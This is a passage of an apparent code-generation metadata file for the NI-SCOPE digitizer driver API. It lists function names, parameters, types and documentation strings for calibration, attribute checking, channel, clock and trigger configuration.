'CalGetFrEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'numCoefficients',
'type': 'ViInt32'
},
{
'direction': 'out',
'name': 'polynomialFitCoefficients',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalGetSerialDacVoltageEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'out',
'name': 'serialDacVolts',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalSelfCalibrate': {
'documentation': {
'description': '\nSelf-calibrates most NI digitizers, including all SMC-based devices and\nmost Traditional NI-DAQ (Legacy) devices. To verify that your digitizer\nsupports self-calibration, refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__.\n\nFor SMC-based digitizers, if the self-calibration is performed\nsuccessfully in a regular session, the calibration constants are\nimmediately stored in the self-calibration area of the EEPROM. If the\nself-calibration is performed in an external calibration session, the\ncalibration constants take effect immediately for the duration of the\nsession. However, they are not stored in the EEPROM until\nniScope_CalEnd is called with **action** set to\nNISCOPE_VAL_ACTION_STORE and no errors occur.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': 'Option.SELF_CALIBRATE_ALL_CHANNELS',
'direction': 'in',
'documentation': {
'description': '\nThe calibration option. Use VI_NULL for a normal self-calibration\noperation or NISCOPE_VAL_CAL_RESTORE_EXTERNAL_CALIBRATION to\nrestore the previous calibration.\n'
},
'enum': 'Option',
'name': 'option',
'type': 'ViInt32'
}
],
'python_name': 'self_cal',
'returns': 'ViStatus'
},
'CalSetAdcVoltageEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'adcVoltageGain',
'type': 'ViReal32'
},
{
'direction': 'in',
'name': 'adcVoltageOffset',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalSetFrEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'numCoefficients',
'type': 'ViInt32'
},
{
'direction': 'out',
'name': 'polynomialFitCoefficients',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CalSetSerialDacVoltageEeprom': {
'codegen_method': 'no',
'documentation': {
'description': 'TBD'
},
'parameters': [
{
'direction': 'in',
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'name': 'serialDacVolts',
'type': 'ViReal32'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViBoolean': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViBoolean attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViInt32': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViInt32 attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViInt64': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViInt64 attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViInt64'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViReal64': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViReal64 attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViSession': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViSession attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'CheckAttributeViString': {
'codegen_method': 'no',
'documentation': {
'description': 'Verifies the validity of a value you specify for a ViString attribute.'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The ID of an attribute.'
},
'name': 'attributeId',
'type': 'ViAttr'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe value that you want to verify for the attribute. Some values might\nnot be valid depending on the current settings of the instrument\nsession.\n'
},
'name': 'value',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'ClearError': {
'codegen_method': 'no',
'documentation': {
'description': '\nClears the error information for the current execution thread and the\nIVI session you specify. If you pass VI_NULL for the Instrument Handle\nparameter, this function clears the error information only for the\ncurrent execution thread.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ClearInterchangeWarnings': {
'codegen_method': 'no',
'documentation': {
'description': 'Clears the list of current interchange warnings.',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ClearWaveformMeasurementStats': {
'codegen_method': 'private',
'documentation': {
'description': '\nClears the waveform stats on the channel and measurement you specify. If\nyou want to clear all of the measurements, use\nNISCOPE_VAL_ALL_MEASUREMENTS in the **clearableMeasurementFunction**\nparameter.\n\nEvery time a measurement is called, the statistics information is\nupdated, including the min, max, mean, standard deviation, and number of\nupdates. This information is fetched with\nniScope_FetchMeasurementStats. The multi-acquisition array measurements\nare also cleared with this function.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'default_value': '_ClearableMeasurement.ALL_MEASUREMENTS',
'direction': 'in',
'documentation': {
'description': '\nThe `scalar\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(scalar_measurements_refs)>`__\nor `array\nmeasurement <REPLACE_DRIVER_SPECIFIC_URL_2(array_measurements_refs)>`__\nto clear the stats for.\n'
},
'enum': 'ClearableMeasurement',
'name': 'clearableMeasurementFunction',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ClearWaveformProcessing': {
'codegen_method': 'private',
'documentation': {
'description': '\nClears the list of processing steps assigned to the given channel. The\nprocessing is added using the niScope_AddWaveformProcessing function,\nwhere the processing steps are completed in the same order in which they\nare registered. The processing measurements are streamed, so the result\nof the first processing step is used as the input for the next step. The\nprocessing is also done before any other measurements.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
}
],
'returns': 'ViStatus'
},
'Commit': {
'documentation': {
'description': '\nCommits to hardware all the parameter settings associated with the task.\nUse this function if you want a parameter change to be immediately\nreflected in the hardware. This function is not supported for\nTraditional NI-DAQ (Legacy) devices.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
}
],
'returns': 'ViStatus'
},
'ConfigureAcquisition': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures how the digitizer acquires data and fills the waveform\nrecord.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the manner in which the digitizer acquires data and fills the\nwaveform record; NI-SCOPE sets NISCOPE_ATTR_ACQUISITION_TYPE to this\nvalue.\n\n**Defined Values**\n\nNISCOPE_VAL_NORMAL\n\nNISCOPE_VAL_FLEXRES\n\nNISCOPE_VAL_DDC\n',
'note': '\nNISCOPE_VAL_DDC applies to the NI 5620/5621 only. To use DDC mode in\nthe NI 5142/5622, leave **acquisitionType** set to NISCOPE_VAL_NORMAL\nand set NISCOPE_ATTR_DDC_ENABLED to True.\n'
},
'name': 'acquisitionType',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureAcquisitionRecord': {
'codegen_method': 'no',
'documentation': {
'description': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nConfigures the most commonly configured attributes of the instrument\nacquisition subsystem.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the time per record.\n\nUnits: Seconds.\n'
},
'name': 'timePerRecord',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nPass the minimum number of points you require in the record for each\nchannel. Call niScope_ActualRecordLength to obtain the actual record\nlength used.\n\nValid Values: 1 – available onboard memory\n'
},
'name': 'minNumPoints',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the position of the first point in the waveform record\nrelative to the trigger event.\n'
},
'name': 'acquisitionStartTime',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureChanCharacteristics': {
'documentation': {
'description': '\nConfigures the attributes that control the electrical characteristics of\nthe channel—the input impedance and the bandwidth.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe input impedance for the channel; NI-SCOPE sets\nNISCOPE_ATTR_INPUT_IMPEDANCE to this value.\n'
},
'name': 'inputImpedance',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe bandwidth for the channel; NI-SCOPE sets\nNISCOPE_ATTR_MAX_INPUT_FREQUENCY to this value. Pass 0 for this\nvalue to use the hardware default bandwidth. Pass –1 for this value to\nachieve full bandwidth.\n'
},
'name': 'maxInputFrequency',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureChannel': {
'codegen_method': 'no',
'documentation': {
'description': "\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nConfigures the most commonly configured attributes of the instrument's\nchannel subsystem.\n"
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe channel to configure. For more information, refer to `channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm\',\'cvichannelstringsyntaxforc)>`__.\n\nDefault Value: "0"\n'
},
'name': 'channel',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the voltage range for the specified channel(s).'
},
'name': 'range',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSelects the DC offset added to the specified channel(s).\n\nDefault Value: 0\n'
},
'name': 'offset',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify how you want the digitizer to couple the input signal for the\nchannel.\n\nDefined Values\n\nNISCOPE_VAL_AC (0)\n\nNISCOPE_VAL_DC (1)\n\nNISCOPE_VAL_GND (2)\n\nA certain amount of delay is required for the coupling capacitor to\ncharge after changing vertical coupling from DC to AC. This delay is\ntypically:\n\n| Low Impedance Source—150 ms\n| 10X Probe—1.5 s\n| 100X Probe—15 s\n'
},
'name': 'coupling',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the probe attenuation for the specified channel(s).\n\nDefault Value: 1.00\n\nValid Range: 1.00 – 100\n\nIf you have a probe with *y*\\ X attenuation, set this parameter to *y*.\nFor example, enter a value of 10 for a 10X probe.\n'
},
'name': 'probeAttenuation',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify whether to enable the digitizer to acquire data for the channel\nwhen you call niScope_InitiateAcquisition or niScope_ReadWaveform.\n\n| Default Value:\n| NISCOPE_VAL_TRUE (1)\n\nDefined Values\n\n| NISCOPE_VAL_TRUE (1)—Acquire data on this channel\n| NISCOPE_VAL_FALSE (0)—Do not acquire data on this channel\n'
},
'name': 'enabled',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'ConfigureClock': {
'codegen_method': 'no',
'documentation': {
'description': "\nConfigures the attributes for synchronizing the digitizer to a reference\nor sending the digitizer's reference clock output to be used as a\nsynchronizing clock for other digitizers.\n",
'note': '\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the input source for the reference clock to which the 100 MHz\nsample clock is phase-locked. Refer to\nNISCOPE_ATTR_INPUT_CLOCK_SOURCE for more information.\n'
},
'name': 'inputClockSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': "\nSpecifies the output source for the reference clock to which another\nscope's sample clock can be phased-locked. Refer to\nNISCOPE_ATTR_OUTPUT_CLOCK_SOURCE for more information\n"
},
'name': 'outputClockSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nFor the NI 5102, specifies the line on which the sample clock is sent or\nreceived. For the NI 5112/5620/5621/5911, specifies the line on which\nthe one time sync pulse is sent or received. This line should be the\nsame for all devices to be synchronized. Refer to\nNISCOPE_ATTR_CLOCK_SYNC_PULSE_SOURCE for more information.\n'
},
'name': 'clockSyncPulseSource',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want the device to be a master or a slave. The\nmaster device is typically the originator of the trigger signal and\nclock sync pulse. For a standalone device, set this attribute to\nVI_FALSE.\n\nRefer to NISCOPE_ATTR_MASTER_ENABLE for more information.\n'
},
'name': 'masterEnabled',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'ConfigureEdgeTriggerSource': {
'codegen_method': 'no',
'documentation': {
'description': '\nSets the edge triggering attributes. An edge trigger occurs when the\ntrigger signal specified with the source parameter passes through the\nvoltage threshold specified with the level parameter and has the slope\nspecified with the slope parameter.\n\nThis function affects instrument behavior only if the triggerType is\nNISCOPE_VAL_EDGE. Set the trigger type and trigger coupling before\ncalling this function.\n\nIf the trigger source is one of the analog input channels, you must\nconfigure the vertical range, vertical offset, vertical coupling, probe\nattenuation, and the maximum input frequency before calling this\nfunction.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe voltage threshold for the trigger. Refer to\nNISCOPE_ATTR_TRIGGER_LEVEL for more information.\n'
},
'name': 'source',
'type': 'ViString'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe voltage threshold for the trigger. Refer to\nNISCOPE_ATTR_TRIGGER_LEVEL for more information.\n'
},
'name': 'level',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies whether you want a rising edge or a falling edge to trigger\nthe digitizer. Refer to NISCOPE_ATTR_TRIGGER_SLOPE for more\ninformation.\n'
},
'name': 'slope',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureEqualizationFilterCoefficients': {
'documentation': {
'description': '\nConfigures the custom coefficients for the equalization FIR filter on\nthe device. This filter is designed to compensate the input signal for\nartifacts introduced to the signal outside of the digitizer. Because\nthis filter is a generic FIR filter, any coefficients are valid.\nCoefficient values should be between +1 and –1.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': "\nThe channel to configure. For more information, refer to `Channel String\nSyntax <REPLACE_DRIVER_SPECIFIC_URL_2(scopefunc.chm','cvichannelstringsyntaxforc)>`__.\n"
},
'name': 'channelList',
'type': 'ViConstString'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of coefficients being passed in the **coefficients** array.'
},
'name': 'numberOfCoefficients',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe custom coefficients for the equalization FIR filter on the device.\nThese coefficients should be between +1 and –1. You can obtain the\nnumber of coefficients from the\n`NISCOPE_ATTR_EQUALIZATION_NUM_COEFFICIENTS <cviNISCOPE_ATTR_EQUALIZATION_NUM_COEFFICIENTS.html>`__\nattribute. The\n`NISCOPE_ATTR_EQUALIZATION_FILTER_ENABLED <cviNISCOPE_ATTR_EQUALIZATION_FILTER_ENABLED.html>`__\nattribute must be set to TRUE to enable the filter.\n'
},
'name': 'coefficients',
'size': {
'mechanism': 'len',
'value': 'numberOfCoefficients'
},
'type': 'ViReal64[]'
}
],
'returns': 'ViStatus'
},
'ConfigureHorizontalTiming': {
'documentation': {
'description': '\nConfigures the common properties of the horizontal subsystem for a\nmultirecord acquisition in terms of minimum sample rate.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe sampling rate for the acquisition. Refer to\nNISCOPE_ATTR_MIN_SAMPLE_RATE for more information.\n'
},
'name': 'minSampleRate',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe minimum number of points you need in the record for each channel;\ncall niScope_ActualRecordLength to obtain the actual record length\nused.\n\nValid Values: Greater than 1; limited by available memory\n'
},
'name': 'minNumPts',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe position of the Reference Event in the waveform record specified as\na percentage.\n'
},
'name': 'refPosition',
'type': 'ViReal64'
},
{
'direction': 'in',
'documentation': {
'description': 'The number of records to acquire'
},
'name': 'numRecords',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nIndicates whether the digitizer enforces real-time measurements or\nallows equivalent-time (RIS) measurements; not all digitizers support\nRIS—refer to `Features Supported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n\nDefault value: VI_TRUE\n\n**Defined Values**\n\nVI_TRUE—Allow real-time acquisitions only\n\nVI_FALSE—Allow real-time and equivalent-time acquisitions\n'
},
'name': 'enforceRealtime',
'type': 'ViBoolean'
}
],
'returns': 'ViStatus'
},
'ConfigureRefLevels': {
'codegen_method': 'private',
'documentation': {
'description': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n\nConfigures the reference levels for all channels of the digitizer. The\nlevels may be set on a per channel basis by setting\nNISCOPE_ATTR_MEAS_CHAN_HIGH_REF_LEVEL,\nNISCOPE_ATTR_MEAS_CHAN_LOW_REF_LEVEL, and\nNISCOPE_ATTR_MEAS_CHAN_MID_REF_LEVEL\n\nThis function configures the reference levels for waveform measurements.\nCall this function before calling niScope_FetchMeasurement to take a\nrise time, fall time, width negative, width positive, duty cycle\nnegative, or duty cycle positive measurement.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'default_value': 10.0,
'direction': 'in',
'documentation': {
'description': '\nPass the low reference you want the digitizer to use for waveform\nmeasurements.\n\nUnits: Either a percentage or voltage based on\nNISCOPE_ATTR_MEAS_REF_LEVEL_UNITS. A percentage is calculated with\nthe voltage low and voltage high measurements representing 0% and 100%,\nrespectively.\n\nDefault Value: 10.0\n'
},
'name': 'low',
'type': 'ViReal64'
},
{
'default_value': 50.0,
'direction': 'in',
'documentation': {
'description': '\nPass the mid reference you want the digitizer to use for waveform\nmeasurements.\n\nUnits: Either a percentage or voltage based on\nNISCOPE_ATTR_MEAS_REF_LEVEL_UNITS. A percentage is calculated with\nthe voltage low and voltage high measurements representing 0% and 100%,\nrespectively.\n\nDefault Value: 50.0\n'
},
'name': 'mid',
'type': 'ViReal64'
},
{
'default_value': 90.0,
'direction': 'in',
'documentation': {
'description': '\nPass the high reference you want the digitizer to use for waveform\nmeasurements.\n\nUnits: Either a percentage or voltage based on\nNISCOPE_ATTR_MEAS_REF_LEVEL_UNITS. A percentage is calculated with\nthe voltage low and voltage high measurements representing 0% and 100%,\nrespectively.\n\nDefault Value: 90.0\n'
},
'name': 'high',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTrigger': {
'codegen_method': 'no',
'documentation': {
'description': '\nConfigures the common attributes of the trigger subsystem.\n\nWhen you use niScope_ReadWaveform, the instrument waits for a trigger.\nYou specify the type of trigger for which the instrument waits with the\nTrigger Type parameter.\n\nIf the instrument requires multiple waveform acquisitions to build a\ncomplete waveform, it waits for the length of time you specify with the\n**holdoff** parameter to elapse since the previous trigger. The\ninstrument then waits for the next trigger.\n',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': 'Specifies the type of trigger for which the digitizer will wait.'
},
'name': 'triggerType',
'type': 'ViInt32'
},
{
'direction': 'in',
'documentation': {
'description': '\nThe length of time the digitizer waits after detecting a trigger before\nenabling NI-SCOPE to detect another trigger. Refer to\nNISCOPE_ATTR_TRIGGER_HOLDOFF for more information.\n'
},
'name': 'holdoff',
'type': 'ViReal64'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerCoupling': {
'codegen_method': 'no',
'documentation': {
'description': 'Sets the trigger coupling attribute.',
'note': '\nThis function is included for compliance with the IviScope Class\nSpecification.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecify how you want the instrument to couple the trigger signal.\n\nDefined Values\n\n NISCOPE_VAL_AC (0)\n\n NISCOPE_VAL_DC (1)\n\nNISCOPE_VAL_HF_REJECT (2)\n\nNISCOPE_VAL_LF_REJECT (3)\n\nNISCOPE_VAL_AC_PLUS_HF_REJECT (1001)\n'
},
'name': 'coupling',
'type': 'ViInt32'
}
],
'returns': 'ViStatus'
},
'ConfigureTriggerDigital': {
'documentation': {
'description': '\nConfigures the common properties of a digital trigger.\n\nWhen you initiate an acquisition, the digitizer waits for the start\ntrigger, which is configured through the NISCOPE_ATTR_ACQ_ARM_SOURCE\n(Start Trigger Source) attribute. The default is immediate. Upon\nreceiving the start trigger the digitizer begins sampling pretrigger\npoints. After the digitizer finishes sampling pretrigger points, the\ndigitizer waits for a reference (stop) trigger that you specify with a\nfunction such as this one. Upon receiving the reference trigger the\ndigitizer finishes the acquisition after completing posttrigger\nsampling. With each Configure Trigger function, you specify\nconfiguration parameters such as the trigger source and the amount of\ntrigger delay.\n',
'note': '\nFor multirecord acquisitions, all records after the first record are\nstarted by using the Advance Trigger Source. The default is immediate.\n\nYou can adjust the amount of pre-trigger and post-trigger samples using\nthe reference position parameter on the\nniScope_ConfigureHorizontalTiming function. The default is half of the\nrecord length.\n\nSome features are not supported by all digitizers. Refer to `Features\nSupported by\nDevice <REPLACE_DRIVER_SPECIFIC_URL_1(features_supported_main)>`__ for\nmore information.\n\nDigital triggering is not supported in RIS mode.\n'
},
'parameters': [
{
'direction': 'in',
'documentation': {
'description': '\nThe instrument handle you obtain from niScope_init that identifies a\nparticular instrument session.\n'
},
'name': 'vi',
'type': 'ViSession'
},
{
'direction': 'in',
'documentation': {
'description': '\nSpecifies the trigger source. Refer to NISCOPE_ATTR_TRIGGER_SOURCE\nfor defined values.\n'
},
'name': 'triggerSource',
'type': 'ViConstString'
},
{
'default_value': 'TriggerSlope.POSITIVE',
'direction': 'in',
'documentation': {
